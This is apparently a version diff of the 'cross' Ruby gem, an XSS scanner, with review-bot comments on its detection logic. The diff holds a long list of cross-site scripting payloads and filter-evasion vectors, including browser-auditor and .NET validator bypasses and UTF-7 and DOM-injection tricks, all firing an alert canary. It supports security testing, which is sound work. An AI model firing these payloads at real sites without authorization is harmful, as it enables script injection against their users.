cross 0.50.0 → 0.60.0

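--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
  ---
  SHA1:
- metadata.gz: 72b79605b86769c7845420cf772fe7e5ca4251c9
- data.tar.gz: de0ec4524597cd129cd1957bdca99587b743f0fa
+ metadata.gz: 4f1bec8b1ce4f2e496fe86f5d966efb87696b4e9
+ data.tar.gz: 8953c2f3a406c7a3cedbeb6f09395e2ddd7e5c11
  SHA512:
- metadata.gz: 4164f2710605496b67199f45f03f4b680c3926909f949b825f16b6a799534afca8c56496275c1d5f5e9a80139268ca0e90e2d189367981c14c64920732441c29
- data.tar.gz: 8cec8b9fb129209cdf5266b5e046bff9265f06aec82c68dc00c8bb0727a259ca2715bfbfd94790d62356d160ed347efa9a3ee44ff30aeb0f13a2efce9726ec36
+ metadata.gz: acb82a8dbe95bf8c952f2537d03642ec4f6d059202914d93f8509605beb208bf6088fdca447d84934f5d61446b7ad4e8f9b3442ed213091685abade5879c006e
+ data.tar.gz: a159b734f9bb303170e2e922c936c4c89abfe83524f58f2392bee7e0b2e679813c8371d5c01edd46faa615b39e26f4e94cb7b020aa73e0eeba7ac0d1954b8cb6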
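--- a/data/lib/cross/engine.rb
+++ b/data/lib/cross/engine.rb
@@ -75,8 +75,8 @@ module Cross
 
  scripts = page.search("//script")
  scripts.each do |sc|
- $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert('cross canary')")
- return true if sc.children.text.include?("alert('cross canary')")
+ $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+ return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
  end
 
  return false if options[:oneshot]
@@ -115,8 +115,6 @@ module Cross
  ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
  ff.value = pattern if ff.name==options[:parameter_to_tamper]
 
-
- # promo=Promo1&codice=&nome=&cognome=&indirizzo=%3Cscript%3Ealert%28%27cross+canary%27%29%3C%2Fscript%3E&comune=&CAP=&provincia=&num1=&num2=&mail=&codfisc=&fase=1
  end
  end
 
@@ -126,7 +124,13 @@ module Cross
  $logger.err "Page is empty" if pp.body.empty?
  scripts = pp.search("//script")
  scripts.each do |sc|
- return true if sc.children.text.include?("alert('cross canary')")
+ return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+ end
+
+ # This is for input html field javascript event evasion
+ inputs = pp.search("//input")
+ inputs.each do |input|
+ return true if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
  end
  end
  return false if options[:oneshot]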
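Review bot: The new `//input` loop only detects the canary in an `onmouseover` attribute of an `<input>` element, so the other attribute-based vectors in the payload list (`onerror`, `onfocus`, `onreadystatechange`, `javascript:` URLs in `src`/`data`/`formaction`) still go unreported when they are reflected, and even the `a onmouseover=...` vector is missed if the tampered value lands in a tag other than `<input>`. One XPath over every event-handler attribute covers all of them: `pp.xpath("//@*[starts-with(name(), 'on')]").each { |attr| return true if attr.value.include?("alert(#{Cross::Attack::XSS::CANARY})") }`, with a similar pass over `src`/`href`/`data`/`formaction` values for the `javascript:` payloads. Also note that `include?` on the script text is a reflection check, not an execution check — a canary reflected inside a JavaScript string literal or comment is reported the same way — so a comment such as `# reports "reflected unescaped", not "proven to execute"` above the loop would set expectations for users of the result. The enclosing method starts and ends outside this hunk.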
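--- a/data/lib/cross/version.rb
+++ b/data/lib/cross/version.rb
@@ -1,3 +1,3 @@
  module Cross
- VERSION = "0.50.0"
+ VERSION = "0.60.0"
  end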
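--- a/data/lib/cross/xss.rb
+++ b/data/lib/cross/xss.rb
@@ -2,69 +2,71 @@ module Cross
  module Attack
  class XSS
 
+ CANARY = 666
+
  def self.each
 
  evasions = [
- "<script>alert('cross canary')</script>",
- "<script>alert('cross canary');</script>",
- "/--><script>alert('cross canary')</script>",
- "/--><script>alert('cross canary');</script>",
- "/--></ScRiPt><ScRiPt>alert('cross canary')</ScRiPt>",
- "/--></ScRiPt><ScRiPt>alert('cross canary');</ScRiPt>",
- "//;-->alert('cross canary')",
- "//;-->alert('cross canary');",
- "\"//;\nalert('cross canary')",
- "\"//;\nalert('cross canary');",
- " onmouseover=alert('1');",
+ "a onmouseover=alert(#{Cross::Attack::XSS::CANARY})",
+ "<script>alert(#{Cross::Attack::XSS::CANARY})</script>",
+ "<script>alert(#{Cross::Attack::XSS::CANARY});</script>",
+ "/--><script>alert(#{Cross::Attack::XSS::CANARY})</script>",
+ "/--><script>alert(#{Cross::Attack::XSS::CANARY});</script>",
+ "/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY})</ScRiPt>",
+ "/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY});</ScRiPt>",
+ "//;-->alert(#{Cross::Attack::XSS::CANARY})",
+ "//;-->alert(#{Cross::Attack::XSS::CANARY});",
+ "\"//;\nalert(#{Cross::Attack::XSS::CANARY})",
+ "\"//;\nalert(#{Cross::Attack::XSS::CANARY});",
  # more exotic vectors (antisnatchor's collection)
- "<script/anyjunk>alert('cross canary')</script>",
- "<<script>alert('cross canary');//<</script>",
- "<img onerror=alert('cross canary') src=a>",
- "<xml onreadystatechange=alert('cross canary')>",
- "<style onreadystatechange=alert('cross canary')>",
- "<iframe onreadystatechange=alert('cross canary')>",
- "<object onerror=alert('cross canary')>",
- "<object type=image src=/images/live.gif onreadystatechange=alert('cross canary')></object>",
- "<img type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
- "<input type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
- "<isindex type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
- "<script onreadystatechange=alert('cross canary')>",
- "<bgsound onpropertychange=alert('cross canary')>",
- "<body onbeforeactivate=alert('cross canary')>",
- "<body onfocusin=alert('cross canary')>",
- "<input autofocus onfocus=alert('cross canary')>",
- "<input onblur=alert('cross canary') autofocus><input autofocus>",
- "<body onscroll=alert('cross canary')><br><br>...<br><input autofocus>",
- "</a onmousemove=alert('cross canary')>",
- "<video src=1 onerror=alert('cross canary')>",
- "<audio src=1 onerror=alert('cross canary')>",
- "<object data=javascript:alert('cross canary')>",
- "<iframe src=javascript:alert('cross canary')>",
- "<embed src=javascript:alert('cross canary')>",
- "<form id=test /><button form=test formaction=javascript:alert('cross canary')>",
- "<event-source src=javascript:alert('cross canary')>",
- "<x style=behavior:url(#default#time2) onbegin=alert('cross canary')>",
- "<x style=x:expression(alert('cross canary'))>",
- "<x onclick=alert('cross canary') src=a>Click here</x>",
- "<img onerror=\"alert('cross canary')\"src=a>",
- "<img onerror=`alert('cross canary')`src=a>",
- "<img/onerror=\"alert('cross canary')\"src=a>",
- "<img onerror=a&#x6c;ert('cross canary') src=a>",
- "<img onerror=a&#x06c;ert('cross canary') src=a>",
- "<img onerror=a&#x006c;ert('cross canary') src=a>",
- "<img onerror=a&#x0006c;ert('cross canary') src=a>",
- "<img onerror=a&#108;ert('cross canary') src=a>",
- "<img onerror=a&#0108;ert('cross canary') src=a>",
- "<img onerror=a&#0108;ert('cross canary') src=a>",
- "<img onerror=a&#108ert('cross canary') src=a>",
- "<img onerror=a&#0108ert('cross canary') src=a>",
- "<script>function::['alert']('cross canary')</script>",
- "<svg><script>//&#x0A;alert('cross canary')</script>", #Chrome <= 18 XssAuditor bypass
- "<script>/*///*/alert('cross canary');</script>", #Chrome <= 20 XssAuditor bypass
- "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('cross canary'))>", #.NET RequestValidator bypass
- "+ADw-script+AD4-alert('cross canary')+ADw-/script+AD4-", # UTF-7
- "},alert('cross canary'),function x(){//", # DOM breaker
- "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('cross canary')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
+ "<script/anyjunk>alert(#{Cross::Attack::XSS::CANARY})</script>",
+ "<<script>alert(#{Cross::Attack::XSS::CANARY});//<</script>",
+ "<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<xml onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<style onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<iframe onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<object onerror=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<object type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})></object>",
+ "<img type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<input type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<isindex type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<script onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<bgsound onpropertychange=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<body onbeforeactivate=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<body onfocusin=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<input autofocus onfocus=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<input onblur=alert(#{Cross::Attack::XSS::CANARY}) autofocus><input autofocus>",
+ "<body onscroll=alert(#{Cross::Attack::XSS::CANARY})><br><br>...<br><input autofocus>",
+ "</a onmousemove=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<video src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<audio src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<object data=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<iframe src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<embed src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<form id=test /><button form=test formaction=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<event-source src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
+ "<x style=behavior:url(#default#time2) onbegin=alert(#{Cross::Attack::XSS::CANARY})>",
+ "<x style=x:expression(alert(#{Cross::Attack::XSS::CANARY}))>",
+ "<x onclick=alert(#{Cross::Attack::XSS::CANARY}) src=a>Click here</x>",
+ "<img onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
+ "<img onerror=`alert(#{Cross::Attack::XSS::CANARY})`src=a>",
+ "<img/onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
+ "<img onerror=a&#x6c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#x06c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#x006c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#x0006c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#0108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#0108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#108ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<img onerror=a&#0108ert(#{Cross::Attack::XSS::CANARY}) src=a>",
+ "<script>function::['alert'](#{Cross::Attack::XSS::CANARY})</script>",
+ "<svg><script>//&#x0A;alert(#{Cross::Attack::XSS::CANARY})</script>", #Chrome <= 18 XssAuditor bypass
+ "<script>/*///*/alert(#{Cross::Attack::XSS::CANARY});</script>", #Chrome <= 20 XssAuditor bypass
+ "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(#{Cross::Attack::XSS::CANARY}))>", #.NET RequestValidator bypass
+ "+ADw-script+AD4-alert(#{Cross::Attack::XSS::CANARY})+ADw-/script+AD4-", # UTF-7
+ "},alert(#{Cross::Attack::XSS::CANARY}),function x(){//", # DOM breaker
+ "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(#{Cross::Attack::XSS::CANARY})\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
  ]
  evasions.each do |pattern|
  yield pattern if block_given?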
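Review bot: `CANARY = 666` is a fixed literal, so the substring match on `alert(666)` that the engine performs will fire on any page that already contains that text — including payloads left behind by an earlier scan of the same target or by another tester — and a finding cannot be tied to the run that produced it; a value chosen at load time, e.g. `CANARY = SecureRandom.random_number(10**9)` with `require 'securerandom'`, removes that ambiguity, at the cost that a payload stored by a previous process is no longer recognised (which may or may not be the intended trade-off for stored-XSS testing). Two smaller points on the new side: `"<img onerror=a&#0108;ert(#{Cross::Attack::XSS::CANARY}) src=a>"` appears twice (new lines 59 and 60), which costs one extra request per tampered parameter for no added coverage, and inside `class XSS` the interpolations can simply read `#{CANARY}`. The `evasions` array is also rebuilt on every call to `self.each`; a frozen class-level constant (`EVASIONS = [...].freeze`) defined after `CANARY` would be the idiomatic form. `self.each` continues past the end of this hunk.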
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: cross
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.50.0
4
+ version: 0.60.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - Paolo Perego